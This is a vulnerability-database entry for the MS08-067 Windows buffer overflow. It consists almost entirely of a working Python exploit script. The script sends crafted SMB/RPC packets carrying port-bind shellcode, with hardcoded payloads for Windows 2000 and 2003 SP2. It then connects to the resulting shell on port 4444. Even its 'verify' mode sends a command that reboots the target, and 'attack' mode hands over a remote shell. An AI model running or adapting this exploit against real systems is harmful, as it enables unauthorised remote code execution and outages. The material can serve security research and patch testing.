Windows ms08-067 缓冲区溢出漏洞

2012-10-15T00:00:00
ID SSV:88222
Type seebug
Reporter Root
Modified 2012-10-15T00:00:00

Description

No description provided by source.

                                        
                                            
                                                #!/usr/bin/env python 
# coding=utf-8

import struct
import sys
import socket
from threading import Thread    #Thread is imported incase you would like to modify the src to run against multiple targets
from urlparse import urlparse
try:
	from impacket import smb
	from impacket import uuid
	from impacket.dcerpc import dcerpc
	from impacket.dcerpc import transport
except ImportError, _:
	print 'Install the following library to make this script work'
	print 'Impacket : http://oss.coresecurity.com/projects/impacket.html'
	print 'PyCrypto : http://www.amk.ca/python/code/crypto.html'
	sys.exit(1)

from comm import cmdline
from comm import generic

poc_info={
    'VulId'       : '0866',
    'Name'        : 'Windows ms08-067 缓冲区溢出漏洞 POC',
    'AppName'     : 'Windows',
    'AppPowerLink': '',
    'AppVersion'  : '',
    'VulType'     : 'Buffer Overflow',
    'Desc'        : '''''',
    'Author'      : ['niubl @ Knowsec'],
    'VulDate'     : '2008-10-22',
    'CreateDate'  : '2014-01-06',
    'UpdateDate'  : '2014-01-06',
    'References'  : ['http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4250'],
    'Version'     : '1',
}
io_info = {
    'URL'     : '',
    'Mode'    : 'v',  
    'Verbose' : False, 
    'Error'   : '',    
    'Status'  : 0,     
    'Result'  : {}
}

#Portbind shellcode from metasploit; Binds port to TCP port 4444
shellcode_verify  = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
shellcode_verify += "\x29\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\xe9"
shellcode_verify += "\x4a\xb6\xa9\x83\xee\xfc\xe2\xf4\x15\x20\x5d\xe4\x01\xb3\x49\x56"
shellcode_verify += "\x16\x2a\x3d\xc5\xcd\x6e\x3d\xec\xd5\xc1\xca\xac\x91\x4b\x59\x22"
shellcode_verify += "\xa6\x52\x3d\xf6\xc9\x4b\x5d\xe0\x62\x7e\x3d\xa8\x07\x7b\x76\x30"
shellcode_verify += "\x45\xce\x76\xdd\xee\x8b\x7c\xa4\xe8\x88\x5d\x5d\xd2\x1e\x92\x81"
shellcode_verify += "\x9c\xaf\x3d\xf6\xcd\x4b\x5d\xcf\x62\x46\xfd\x22\xb6\x56\xb7\x42"
shellcode_verify += "\xea\x66\x3d\x20\x85\x6e\xaa\xc8\x2a\x7b\x6d\xcd\x62\x09\x86\x22"
shellcode_verify += "\xa9\x46\x3d\xd9\xf5\xe7\x3d\xe9\xe1\x14\xde\x27\xa7\x44\x5a\xf9"
shellcode_verify += "\x16\x9c\xd0\xfa\x8f\x22\x85\x9b\x81\x3d\xc5\x9b\xb6\x1e\x49\x79"
shellcode_verify += "\x81\x81\x5b\x55\xd2\x1a\x49\x7f\xb6\xc3\x53\xcf\x68\xa7\xbe\xab"
shellcode_verify += "\xbc\x20\xb4\x56\x39\x22\x6f\xa0\x1c\xe7\xe1\x56\x3f\x19\xe5\xfa"
shellcode_verify += "\xba\x19\xf5\xfa\xaa\x19\x49\x79\x8f\x22\xa7\xf5\x8f\x19\x3f\x48"
shellcode_verify += "\x7c\x22\x12\xb3\x99\x8d\xe1\x56\x3f\x20\xa6\xf8\xbc\xb5\x66\xc1"
shellcode_verify += "\x4d\xe7\x98\x40\xbe\xb5\x60\xfa\xbc\xb5\x66\xc1\x0c\x03\x30\xe0"
shellcode_verify += "\xbe\xb5\x60\xf9\xbd\x1e\xe3\x56\x39\xd9\xde\x4e\x90\x8c\xcf\xfe"
shellcode_verify += "\x16\x9c\xe3\x56\x39\x2c\xdc\xcd\x8f\x22\xd5\xc4\x60\xaf\xdc\xf9"
shellcode_verify += "\xb0\x63\x7a\x20\x0e\x20\xf2\x20\x0b\x7b\x76\x5a\x43\xb4\xf4\x84"
shellcode_verify += "\x17\x08\x9a\x3a\x64\x30\x8e\x02\x42\xe1\xde\xdb\x17\xf9\xa0\x56"
shellcode_verify += "\x9c\x0e\x49\x7f\xb2\x1d\xe4\xf8\xb8\x1b\xdc\xa8\xb8\x1b\xe3\xf8"
shellcode_verify += "\x16\x9a\xde\x04\x30\x4f\x78\xfa\x16\x9c\xdc\x56\x16\x7d\x49\x79"
shellcode_verify += "\x62\x1d\x4a\x2a\x2d\x2e\x49\x7f\xbb\xb5\x66\xc1\x19\xc0\xb2\xf6"
shellcode_verify += "\xba\xb5\x60\x56\x39\x4a\xb6\xa9"

#Payload for Windows 2000 target
payload_1='\x41\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00'
payload_1+='\x41\x41\x41\x41\x41\x41\x41\x41'
payload_1+='\x41\x41\x41\x41\x41\x41\x41\x41'
payload_1+='\x41\x41'
payload_1+='\x2f\x68\x18\x00\x8b\xc4\x66\x05\x94\x04\x8b\x00\xff\xe0'
payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1+='\xeb\xcc'
payload_1+='\x00\x00'

#Payload for Windows 2003[SP2] target
payload_2='\x41\x00\x5c\x00'
payload_2+='\x2e\x00\x2e\x00\x5c\x00\x2e\x00'
payload_2+='\x2e\x00\x5c\x00\x0a\x32\xbb\x77'
payload_2+='\x8b\xc4\x66\x05\x60\x04\x8b\x00'
payload_2+='\x50\xff\xd6\xff\xe0\x42\x84\xae'
payload_2+='\xbb\x77\xff\xff\xff\xff\x01\x00'
payload_2+='\x01\x00\x01\x00\x01\x00\x43\x43'
payload_2+='\x43\x43\x37\x48\xbb\x77\xf5\xff'
payload_2+='\xff\xff\xd1\x29\xbc\x77\xf4\x75'
payload_2+='\xbd\x77\x44\x44\x44\x44\x9e\xf5'
payload_2+='\xbb\x77\x54\x13\xbf\x77\x37\xc6'
payload_2+='\xba\x77\xf9\x75\xbd\x77\x00\x00'

class SRVSVC_Exploit(Thread):
	def __init__(self, target, osver, mode, port=445):
		super(SRVSVC_Exploit, self).__init__()
		self.__port   = port
		self.target   = target
		self.osver   = osver
		global payload
		if self.osver == 1:
			payload = payload_1
		elif self.osver == 2:
			payload = payload_2
			
		if mode == 'v':
			self.shellcode = shellcode_verify
		elif mode == 'a':
			self.shellcode = shellcode_verify

	def __DCEPacket(self):
		#print '[-]Initiating connection'
		self.__trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\pipe\\browser]' % self.target)
		self.__trans.connect()
		#print '[-]connected to ncacn_np:%s[\\pipe\\browser]' % self.target
		self.__dce = self.__trans.DCERPC_class(self.__trans)
		self.__dce.bind(uuid.uuidtup_to_bin(('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0')))

		# Constructing Malicious Packet
		self.__stub='\x01\x00\x00\x00'
		self.__stub+='\xd6\x00\x00\x00\x00\x00\x00\x00\xd6\x00\x00\x00'
		self.__stub+=self.shellcode
		self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
		self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
		self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
		self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
		self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
		self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
		self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
		self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
		self.__stub+='\x00\x00\x00\x00'
		self.__stub+='\x2f\x00\x00\x00\x00\x00\x00\x00\x2f\x00\x00\x00'
		self.__stub+=payload
		self.__stub+='\x00\x00\x00\x00'
		self.__stub+='\x02\x00\x00\x00\x02\x00\x00\x00'
		self.__stub+='\x00\x00\x00\x00\x02\x00\x00\x00'
		self.__stub+='\x5c\x00\x00\x00\x01\x00\x00\x00'
		self.__stub+='\x01\x00\x00\x00'
		return

	def run(self):
		self.__DCEPacket()
		self.__dce.call(0x1f, self.__stub)   #0x1f (or 31)- NetPathCanonicalize Operation
		#print '[-]Exploit sent to target successfully...\n[1]Telnet to port 4444 on target machine...' 

def main(io_info): 
	'''interface function, io_info is a global io dict'''
	url = io_info.get('URL','')
	mode = io_info.get('Mode','v')
	verbose = io_info.get('Verbose', False)
	headers_fake = generic.modify_headers(io_info)
	target = urlparse(url).netloc
	if mode == 'v': # 仅检测是否存在漏洞
		current = SRVSVC_Exploit(target, 2, mode)
		current.start()
		try:
			addr = (target, 4444)
			s = socket.socket()
			s.connect(addr)
			data = s.recv(2000)
			data = data + s.recv(2000)
			s.send('shutdown /r /t 0\x0a')
			if 'Microsoft Windows' in data:                
				io_info['Status'] = 1
				io_info['Result']['VerifyInfo'] = {}
				io_info['Result']['VerifyInfo']['VerifyInfo'] = target
		except Exception, e:
			if verbose:
				io_info['Error'] = str(e)
				return
	elif mode == 'a':
		current = SRVSVC_Exploit(target, 2, mode)
		current.start()		
		try:
			addr = (target, 4444)
			s = socket.socket()
			s.connect(addr)
			data = s.recv(2000)
			data = data + s.recv(2000)
			#s.send('shutdown /r /t 0\x0a')
			if 'Microsoft Windows' in data:                
				io_info['Status'] = 1
				io_info['Result']['ShellInfo'] = {}
				io_info['Result']['ShellInfo']['URL'] = target
				io_info['Result']['ShellInfo']['Content'] = 'nc host 4444, then you can get a shell'
		except Exception, e:
			if verbose:
				io_info['Error'] = str(e)
				return		
if __name__=="__main__":
	cmdline.main(io_info, usage='', argvs=[])
	if io_info['Verbose']:
		print '\n[*] Init ...\n'
	main(io_info)
	print generic.output(io_info)